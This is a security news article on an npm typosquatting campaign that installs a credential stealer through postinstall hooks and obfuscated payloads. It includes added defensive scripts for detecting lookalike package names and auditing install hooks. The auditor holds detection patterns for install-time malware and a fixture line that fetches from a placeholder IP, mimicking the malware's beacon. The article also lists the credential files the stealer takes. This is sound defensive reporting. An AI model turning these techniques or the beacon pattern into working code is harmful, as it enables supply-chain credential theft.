The Socket Threat Research Team has uncovered an extensive supply chain attack targeting the npm ecosystem, involving 10 malicious packages that deliver a multi-stage credential theft operation disguised as legitimate developer tools. The discovery marks one of the most elaborate npm malware campaigns of 2025, combining typosquatting, fake CAPTCHAs, and multi-layer obfuscation to deploy a powerful cross-platform information stealer.
The malicious packages were published on July 4, 2025, and remained live for over four months, amassing nearly 10,000 downloads before Socket researchers petitioned npm for their removal.
The attacker, using the alias “andrew_r1” and the email parvlhonor@gmx[.]com, uploaded fake versions of widely used open-source packages. Each mimicked legitimate npm libraries to deceive developers through typosquatting — the practice of using lookalike names.
The identified packages include:
- typescriptjs → mimicking TypeScript
- deezcord.js, dizcordjs, dezcord.js → mimicking discord.js
- etherdjs, ethesjs, ethetsjs → mimicking ethers.js
- nodemonjs → mimicking nodemon
- react-router-dom.js → mimicking react-router-dom
- zustand.js → mimicking zustand
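As an added example (not code from Socket’s report or from the packages it describes), the following Node script flags dependency names that imitate popular packages in the ways the list above shows: a stray “js” or “.js” suffix, a doubled letter, or a one- or two-character misspelling. The popular-package list and the two-edit threshold are assumptions for this illustration.

```javascript
// Added example (not from the Socket report): flag npm package names that imitate
// popular packages, using the naming tricks seen in this campaign.
const POPULAR = ['typescript', 'discord.js', 'ethers', 'nodemon', 'react-router-dom', 'zustand'];

// Strip the decorations the campaign used (".js" or "js" suffixes) and collapse
// doubled letters ("deezcord" -> "dezcord") so only real spelling changes remain.
function normalize(name) {
  return name.toLowerCase().replace(/\.js$/, '').replace(/js$/, '').replace(/(.)\1+/g, '$1');
}

// Standard Levenshtein edit distance between two strings.
function editDistance(a, b) {
  const dp = Array.from({ length: a.length + 1 }, (_, i) => [i]);
  for (let j = 1; j <= b.length; j++) dp[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      dp[i][j] = Math.min(dp[i - 1][j] + 1, dp[i][j - 1] + 1, dp[i - 1][j - 1] + cost);
    }
  }
  return dp[a.length][b.length];
}

// Returns the popular package `candidate` appears to imitate, or null.
// The two-edit threshold is a heuristic assumption; tune it against a real allow-list.
function typosquatTarget(candidate, popular = POPULAR) {
  if (popular.includes(candidate)) return null;            // the genuine package itself
  const c = normalize(candidate);
  for (const p of popular) {
    const n = normalize(p);
    if (c === n) return p;                                  // e.g. typescriptjs, zustand.js
    if (c.length >= 5 && editDistance(c, n) <= 2) return p; // e.g. dizcordjs, ethetsjs
  }
  return null;
}

// Audit a dependency list (e.g. the keys of package.json "dependencies").
function findTyposquats(names) {
  const hits = {};
  for (const name of names) {
    const target = typosquatTarget(name);
    if (target) hits[name] = target;
  }
  return hits;
}

// Demo with names from the report plus two legitimate ones.
console.log(findTyposquats(['deezcord.js', 'ethetsjs', 'react-router-dom.js', 'express', 'discord.js']));
```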
Once installed, these packages execute a malicious postinstall script that launches immediately, before the developer has a chance to notice. Socket notes that “each package leverages npm’s postinstall hook to execute immediately upon installation, launching in a new terminal window to avoid detection during the install process.”
The malicious package.json files contained a postinstall script, such as:
The associated install.js script detects the victim’s operating system and opens a new terminal to execute an obfuscated payload. This lets the payload keep running after npm finishes installing and hides its activity from developers.
Socket explains, “By spawning a new terminal window, the malware runs independently of the npm install process. Developers who glance at their terminal during installation see a new window briefly appear, which the malware immediately clears to avoid suspicion.”
The payload is wrapped in four layers of obfuscation, including:
- Self-decoding eval wrapper
- Dynamic XOR encryption
- URL encoding
- Control-flow obfuscation using mixed bases
The report highlights, “The use of mixed number bases (hexadecimal 0x, octal 0o/0O), bitwise operations, and nested state machines makes manual analysis extremely time-consuming.”
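To make the postinstall-hook behaviour and the obfuscation markers described above concrete, here is an added example (not the malware and not Socket’s tooling) that audits a package manifest’s install-time lifecycle hooks and the script they run. The indicator regexes, the threshold of 20 mixed-base literals, and the inline fixture are assumptions constructed for this illustration.

```javascript
// Added example (not from the Socket report): audit a package manifest's install-time
// lifecycle hooks and the script they run for the behaviours this campaign relied on.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall'];
// Each indicator is a regex assumption tied to one behaviour described in the article.
const INDICATORS = [
  { id: 'child-process',    re: /require\(\s*['"]child_process['"]\s*\)/ },
  { id: 'spawns-terminal',  re: /\b(?:osascript|gnome-terminal|xterm|x-terminal-emulator)\b|start\s+cmd/ },
  { id: 'platform-probe',   re: /os\.platform\(\)/ },
  { id: 'eval-wrapper',     re: /\beval\s*\(/ },
  { id: 'url-encoded-blob', re: /(?:%[0-9a-fA-F]{2}){8,}/ },
  { id: 'raw-ip-url',       re: /https?:\/\/\d{1,3}(?:\.\d{1,3}){3}\b/ },
];
// Count hex (0x) and octal (0o/0O) literals; a flood of them suggests control-flow obfuscation.
function mixedBaseLiterals(src) {
  return (src.match(/\b0(?:x[0-9a-fA-F]+|[oO][0-7]+)\b/g) || []).length;
}
// Returns findings as { hook, id, detail }. `sources` maps file names to their contents.
function auditPackage(manifest, sources, mixedBaseThreshold = 20) {
  const findings = [];
  const scripts = (manifest && manifest.scripts) || {};
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (!cmd) continue;
    findings.push({ hook, id: 'lifecycle-hook', detail: cmd });
    const ref = cmd.match(/\bnode\s+(\S+\.[cm]?js)\b/); // e.g. "node install.js"
    const src = ref && sources[ref[1]];
    if (!src) continue;                                  // hook present, script not available
    for (const { id, re } of INDICATORS) {
      if (re.test(src)) findings.push({ hook, id, detail: ref[1] });
    }
    const n = mixedBaseLiterals(src);
    if (n >= mixedBaseThreshold) findings.push({ hook, id: 'mixed-base-literals', detail: `${n} literals` });
  }
  return findings;
}
// Constructed fixture (not the real install.js): it carries only the markers, no working payload.
const SAMPLE_MANIFEST = { name: 'dezcord.js', version: '14.0.0', scripts: { postinstall: 'node install.js' } };
const SAMPLE_SOURCES = {
  'install.js': [
    "const { spawn } = require('child_process');",
    "const os = require('os');",
    "if (os.platform() === 'win32') { /* ... */ }",
    "eval(decodeURIComponent('%63%6f%6e%73%6f%6c%65%2e%6c%6f%67%28%31%29'));", // decodes to console.log(1)
    "fetch('http://192.0.2.10/get_current_ip');", // TEST-NET placeholder, not the real C2
  ].join('\n'),
};
console.log(auditPackage(SAMPLE_MANIFEST, SAMPLE_SOURCES).map(f => f.id));
```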
Upon installation, the malware displays a fake CAPTCHA prompt via Node’s readline interface to trick users into believing they are interacting with legitimate software.
The fake prompt outputs text such as “Please verify you are a human to continue installing” and mimics real npm installation messages like “Installing discord.js package…” with fabricated version numbers and contributor statistics.
After user input, the malware silently sends the victim’s IP address to the attacker-controlled server 195[.]133[.]79[.]43 via the endpoint /get_current_ip.
Socket explains, “This serves multiple purposes: logging which IP addresses installed the malware, potentially excluding certain countries, confirming the victim matches the target profile, and creating a record to identify security researcher activity.”
This allows the threat actor to profile and filter victims before delivering the main payload.
Once the victim interacts with the fake CAPTCHA, the malware automatically downloads a 24MB PyInstaller binary named data_extracter from the same server. A platform-specific build (Windows, macOS, or Linux) is selected using os.platform() detection.
Socket notes, “The data_extracter binary is a 24MB PyInstaller-packaged Python application designed for comprehensive credential theft across multiple platforms.”
This stealer harvests credentials from:
- System keyrings — Windows Credential Manager, macOS Keychain, and Linux SecretService
- Web browsers — extracting cookies, passwords, and session tokens
- Cloud and DevOps tools — .aws/credentials, .kube/config, .docker/config.json, .git-credentials
By exfiltrating session cookies, the malware can bypass multi-factor authentication and impersonate users in AWS, GitHub, Azure, and Google Cloud environments.
Socket adds, “Session cookies can remain valid for hours, days, or even weeks depending on the service’s configuration,” underscoring the potential for long-term unauthorized access.
The stolen credentials are compressed into ZIP archives and stored temporarily in directories such as /var/tmp or /usr/tmp before being transmitted to the attacker’s server.
Socket’s researchers confirm, “The malware creates an archive containing keyring exports, browser SQLite databases, configuration files with embedded API keys, OAuth token stores, and SSH private keys.”
This modular collection and packaging allow efficient data theft while reducing the chance of detection by traditional antivirus systems.